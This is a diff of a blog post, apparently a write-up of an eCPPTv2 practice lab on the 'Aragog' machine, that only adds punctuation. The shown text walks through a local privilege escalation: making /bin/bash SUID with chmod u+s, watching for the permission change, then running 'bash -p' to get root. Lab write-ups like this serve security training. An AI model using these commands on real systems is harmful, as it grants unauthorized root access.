Zeekk3n/Andrey.github.io/_posts/2023-04-04-ecpptv2-writeup.md

 chmod u+s /bin/bash

 ```
-now if everything works we just have to monitoring the bash using watch command
+now if everything works we just have to monitoring the bash using watch command.

 ```bash
 hagrid98@Aragog:/$ watch -n 1 ls -l /bin/bash
 -rwsr-xr-x 1 root root 1168776 Apr 18  2019 /bin/bash
 ```
-and now the permission changed rwsr, we just have to change the privilages of the bash using bash -p
+and now the permission changed rwsr, we just have to change the privilages of the bash using bash -p.
 .
 ```bash
 hagrid98@Aragog:/$ bash -p